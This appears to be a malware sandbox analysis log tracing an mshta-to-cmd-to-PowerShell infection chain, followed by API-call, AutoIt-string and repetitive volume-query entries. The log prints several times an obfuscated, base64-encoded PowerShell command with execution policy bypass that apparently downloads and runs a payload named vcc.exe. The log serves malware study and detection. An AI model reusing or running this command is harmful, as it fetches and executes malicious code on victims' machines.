                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jfhuicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfezc1uwvblicagicagicagicagicagicagicagicagicagicagicaglu1lbujlukrfzklusxrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmbu9ulkrmtcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagighvlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagiep6zkhccfvucsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbatxbrlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbpvmfwy0lowg8ssw50uhryicagicagicagicagicagicagicagicagicagicagicagrvzuyw9lktsnicagicagicagicagicagicagicagicagicagicagicaglu5htuugicagicagicagicagicagicagicagicagicagicagicaiqmlzvkfurm9ziiagicagicagicagicagicagicagicagicagicagicagic1uyu1lc1bby0ugicagicagicagicagicagicagicagicagicagicagicbtd0n6icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicryvdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yoc81njavdmnjlmv4zsisiirltny6qvbqrefuqvx2y2muzxhliiwwldapo1nuqxj0lxnmzwvqkdmpo0lovm9lzs1jvgvnicagicagicagicagicagicagicagicagicagicagicagiirfbny6qvbqrefuqvx2y2muzxhlig=='+[char]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jfhuicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfezc1uwvblicagicagicagicagicagicagicagicagicagicagicaglu1lbujlukrfzklusxrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmbu9ulkrmtcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagighvlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagiep6zkhccfvucsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbatxbrlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbpvmfwy0lowg8ssw50uhryicagicagicagicagicagicagicagicagicagicagicagrvzuyw9lktsnicagicagicagicagicagicagicagicagicagicagicaglu5htuugicagicagicagicagicagicagicagicagicagicagicaiqmlzvkfurm9ziiagicagicagicagicagicagicagicagicagicagicagic1uyu1lc1bby0ugicagicagicagicagicagicagicagicagicagicagicbtd0n6icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicryvdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yoc81njavdmnjlmv4zsisiirltny6qvbqrefuqvx2y2muzxhliiwwldapo1nuqxj0lxnmzwvqkdmpo0lovm9lzs1jvgvnicagicagicagicagicagicagicagicagicagicagicagiirfbny6qvbqrefuqvx2y2muzxhlig=='+[char]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jfhuicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfezc1uwvblicagicagicagicagicagicagicagicagicagicagicaglu1lbujlukrfzklusxrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmbu9ulkrmtcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagighvlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagiep6zkhccfvucsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbatxbrlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbpvmfwy0lowg8ssw50uhryicagicagicagicagicagicagicagicagicagicagicagrvzuyw9lktsnicagicagicagicagicagicagicagicagicagicagicaglu5htuugicagicagicagicagicagicagicagicagicagicagicaiqmlzvkfurm9ziiagicagicagicagicagicagicagicagicagicagicagic1uyu1lc1bby0ugicagicagicagicagicagicagicagicagicagicagicbtd0n6icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicryvdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yoc81njavdmnjlmv4zsisiirltny6qvbqrefuqvx2y2muzxhliiwwldapo1nuqxj0lxnmzwvqkdmpo0lovm9lzs1jvgvnicagicagicagicagicagicagicagicagicagicagicagiirfbny6qvbqrefuqvx2y2muzxhlig=='+[char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jfhuicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfezc1uwvblicagicagicagicagicagicagicagicagicagicagicaglu1lbujlukrfzklusxrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmbu9ulkrmtcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagighvlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagiep6zkhccfvucsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbatxbrlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbpvmfwy0lowg8ssw50uhryicagicagicagicagicagicagicagicagicagicagicagrvzuyw9lktsnicagicagicagicagicagicagicagicagicagicagicaglu5htuugicagicagicagicagicagicagicagicagicagicagicaiqmlzvkfurm9ziiagicagicagicagicagicagicagicagicagicagicagic1uyu1lc1bby0ugicagicagicagicagicagicagicagicagicagicagicbtd0n6icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicryvdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yoc81njavdmnjlmv4zsisiirltny6qvbqrefuqvx2y2muzxhliiwwldapo1nuqxj0lxnmzwvqkdmpo0lovm9lzs1jvgvnicagicagicagicagicagicagicagicagicagicagicagiirfbny6qvbqrefuqvx2y2muzxhlig=='+[char]0x22+'))')))"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00087CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00087CAF
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0008874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_0008874B
                    Source: vcc.exe, 0000000B.00000000.1343912812.00000000000E4000.00000002.00000001.01000000.0000000A.sdmp, vcc.exe.3.dr, vcc[1].exe.3.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: vcc.exeBinary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0005862B cpuid 11_2_0005862B
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
